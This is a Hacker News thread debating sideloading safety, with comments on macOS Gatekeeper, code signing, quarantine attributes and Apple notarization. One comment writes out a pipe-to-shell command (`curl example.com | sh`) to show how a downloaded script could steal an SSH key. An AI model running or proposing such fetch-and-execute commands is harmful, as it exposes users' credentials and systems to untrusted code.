Most active commenters

    ←back to thread

    Is it possible to allow sideloading and keep users safe?

    (shkspr.mobi)
    205 points ColinWright | 16 comments | 30 Aug 25 12:03 UTC | HN request time: 0s | source | bottom
    1. walthamstow ◴[30 Aug 25 13:00 UTC] No.45074258[source]
    MacOS handles it pretty well, I can use it to do what Doctorow calls general computing and my mother can use it to shop and do email. Apple allowing freedom for MacOS but not iOS is inconsistent and I see no good reason for that.
    replies(3): >>45074411 #>>45074422 #>>45074566 #
    2. Almondsetat ◴[30 Aug 25 13:20 UTC] No.45074411[source]
    It is perfectly consistent: iOS is not for general computing
    replies(1): >>45088224 #
    3. vbezhenar ◴[30 Aug 25 13:21 UTC] No.45074422[source]
    MacOS does not handle it well. I can run `curl example.com | sh` and it'll steal my ssh key.
    replies(1): >>45082829 #
    4. MillironX ◴[30 Aug 25 13:35 UTC] No.45074566[source]
    Except Apple code signing on MacOS is basically what Google is trying to copy over to Android. I can run arbitrary programs on MacOS, but I have to go and remove the com.apple.quarantine attribute from any application that doesn't have Apple's explicit permission to exist, i.e. most FOSS apps. I suspect that option will go away eventually.
    replies(2): >>45080824 #>>45081614 #
    5. BriggyDwiggs42 ◴[31 Aug 25 06:21 UTC] No.45080824[source]
    Highly unlikely they’d remove the option with how many devs use macos
    replies(2): >>45081281 #>>45081792 #
    6. Rohansi ◴[31 Aug 25 07:49 UTC] No.45081281{3}[source]
    I think it's more likely Apple will shift everyone to using iPads and phase out Mac.
    replies(1): >>45081588 #
    7. tim333 ◴[31 Aug 25 08:51 UTC] No.45081588{4}[source]
    They'd have a job doing that one. Speaking as a 30 year laptop user with no interest in ipads. I've never seen the point of ipads - it's like a phone that can't make phone calls.
    replies(1): >>45087788 #
    8. latexr ◴[31 Aug 25 08:56 UTC] No.45081614[source]
    > I have to go and remove the com.apple.quarantine attribute

    You do not. You can go into System Settings and allow the app to run.

    replies(1): >>45088212 #
    9. IshKebab ◴[31 Aug 25 09:26 UTC] No.45081792{3}[source]
    They definitely will. They'll change it so that you can locally sign apps with a key that only works on your machine.
    replies(1): >>45081981 #
    10. mike_hearn ◴[31 Aug 25 10:09 UTC] No.45081981{4}[source]
    That already happened. ARM Macs require code to either be signed or "ad-hoc signed", which doesn't use a key so it's not really a signature, it's more like a SHA hash whitelist that's local to your machine.
    replies(1): >>45084200 #
    11. leshenka ◴[31 Aug 25 13:01 UTC] No.45082829[source]
    You have an option to keep your SSH key in the Secure Enclave behind TouchID or YubiKey

    https://github.com/maxgoedjen/secretive

    12. IshKebab ◴[31 Aug 25 16:04 UTC] No.45084200{5}[source]
    So is it not possible to distribute ARM Mac apps without registering them with Apple?
    replies(1): >>45090485 #
    13. Rohansi ◴[31 Aug 25 22:50 UTC] No.45087788{5}[source]
    I'm with you but it's not up to us. Computing has been moving more and more away from desktops and laptops in new (human) generations. iPadOS is slowly becoming Mac-like where you can have a cursor, dock, and have apps open as windows. The Pro models already use the same silicon as some Macs. They could start by eliminating the lower spec Macs because the iPad is basically the same but with a touch screen. You'll just need to get all your apps on the App Store so Apple gets their cut.
    14. EasyMark ◴[01 Sep 25 00:01 UTC] No.45088212{3}[source]
    Is that what the "allow to run" option in security settings is doing in the background?
    15. EasyMark ◴[01 Sep 25 00:03 UTC] No.45088224[source]
    .... yet. We as consumers could push for this though with enough momentum. Not likely but there is nothing stopping Apple from doing it from a technical standpoint other than greed.
    16. mike_hearn ◴[01 Sep 25 07:46 UTC] No.45090485{6}[source]
    This is the point I keep getting at in the other thread, it's a confusing topic.

    It is technically possible, yes. You can turn Gatekeeper off via the command line in various ways, or even via an obscure deliberately non-discoverable set of GUI tricks.

    But it isn't reasonable to expect any normal person to do that. So, in practice, any app that isn't some open source widget targeting developers does register them with Apple. In this sense it also isn't possible.

    This isn't specific to ARM. It's also been true on Intel Macs for a long time too. The only thing that changed on ARM is some minor detail - the kernel now requires a "signature" for all binaries, but a "signature" is also allowed to be a hash match against a local machine-specific whitelist, so this doesn't make much difference in practice to anyone except toolchain developers. It seems to have mostly been about reducing tech debt in the security stack.

    The registration process is however very lightweight. There are no app policies involved beyond "don't distribute malware" and "verify your ID so we can do something about it if you do". It's not like the app store where there are lots of very subjective criteria. To get an identity is nearly automatic, you can do it as an individual with a credit card and approval is automated. Ditto for applications: it's automatic and driven by a simple (albeit undocumented) REST API. You upload a zip containing your signed app to S3, it's processed automatically, the app now works. The notarization API is extremely open - you need an API key, but otherwise anyone can notarize anything, including apps written by other people. So in the early years of this system when lack of notarization just triggered a security warning, lots of people notarized any app they found that was missing it. This made a nice smooth backwards compatible path to transition the ecosystem. Nowadays, there is no bypassable security warning, an unnotarized app is just described as corrupted and won't open without tricks.

    So - does macOS "support" sideloading or not? It's very ambiguous. You can argue both yes and no.